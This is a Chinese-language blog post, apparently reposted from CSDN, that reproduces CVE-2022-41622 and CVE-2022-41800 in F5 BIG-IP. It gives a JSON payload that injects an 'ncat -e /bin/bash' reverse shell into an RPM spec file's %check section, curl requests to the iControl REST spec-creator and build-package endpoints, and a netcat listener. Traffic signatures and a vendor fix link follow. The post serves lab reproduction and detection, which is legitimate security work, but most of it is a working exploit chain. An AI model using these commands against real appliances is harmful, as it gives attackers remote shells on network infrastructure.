码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CVE-2022-41622 & CVE-2022-41800 F5 BIG-IP和BIG-IQ远程代码执行漏洞复现


    目录

    0x01 声明:

    0x02 简介:

    0x03 漏洞概述:

    0x04 影响版本:

    0x05 环境搭建:

    下载&安装

    登录web页面:

    0x06 漏洞复现:

    构造JSON Payload:

    发送请求

    查看服务端:

    攻击主机启动监听器:

    使用jq格式化输出:

    监听成功:

    0x07 流量分析:

    特征一:

    客户端:

    URL:

    DATA:

    Shell流量:

    0x08 修复建议:


    0x01 声明:

            仅供学习参考使用,请勿用作违法用途,否则后果自负。

    0x02 简介:

            F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。

    0x03 漏洞概述:

            在设备模式下运行时,分配了管理员角色的经过身份验证的用户可能能够利用未公开的 iControl REST 端点绕过设备模式限制。成功利用此漏洞可使攻击者跨越安全边界,在装置模式下运行时,分配了管理员角色的已验证用户可能能够利用未公开的iControl REST端点绕过装置模式限制。成功利用此漏洞可使攻击者跨越安全边界。

    0x04 影响版本:

    BIG-IP <17.x

    0x05 环境搭建:

    下载&安装

    参考这篇文章: (CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现_Evan Kang的博客-CSDN博客)

    登录web页面:

    0x06 漏洞复现:

    构造JSON Payload:

    1. {
    2.   "specFileData": {
    3.     "name": "test",
    4.     "srcBasePath": "/tmp",
    5.     "version": "test6",
    6.     "release": "test7",
    7.     "description": "test8\n\n%check\nncat -e /bin/bash 192.168.119.243 4444",
    8.     "summary": "test9"
    9.   }
    10. }

    发送请求

    curl -sk -u admin:P@ssw0rd -H "Content-Type: application/json" -X POST https://192.168.119.220/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 192.168.119.243 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}'

    查看服务端:

    判断请求是否成功

    cat /var/config/rest/node/tmp/*.spec

    攻击主机启动监听器:

    nc -lvp 4444

    使用jq格式化输出:

    Jq安装:

    wget http://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm

    rpm -ivh epel-release-latest-7.noarch.rpm

    yum repolist

    yum -y install jq

    curl -X POST -k -u admin:P@ssw0rd https://192.168.119.220/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFilePath": "/var/config/rest/node/tmp/af35efa2-483e-4b6c-a6be-0c4bf11e36b7.spec", "force": true }' | jq

    监听成功:

    0x07 流量分析:

    特征一:

    客户端:

    URL:

    /mgmt/shared/iapp/build-package

    DATA:

    1. check\nncat -e /bin/bash 192.168.119.243
    2. specFilePath: xxx.spec

    Shell流量:

    0x08 修复建议:

            如果您运行的是已知易受攻击的版本列中列出的版本,可以通过升级到中引入的修复 列中的值。如果该表仅列出比当前运行的版本旧的版本,或者未列出不易受攻击的版本,则当前不存在升级候选版本。

    https://support.f5.com/csp/article/K13325942

  • 相关阅读:
    简述如何使用Androidstudio对文件进行保存和获取文件中的数据
    HTML事件的种类
    工作汇报
    有意思的方向裁切 overflow: clip
    HTML本地离线缓存?
    追踪微服务脉络:Eureka中实现分布式链路追踪的精妙之道
    MST1662,摩托车大功率闪光器
    215.数组中的第K个最大元素
    高复杂度的城市数字化转型“交响曲”,新华三如何奏响?
    linux下安装ffmpeg的详细教程、ffmpeg is not installed
  • 原文地址:https://blog.csdn.net/qq_44281295/article/details/128099642
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号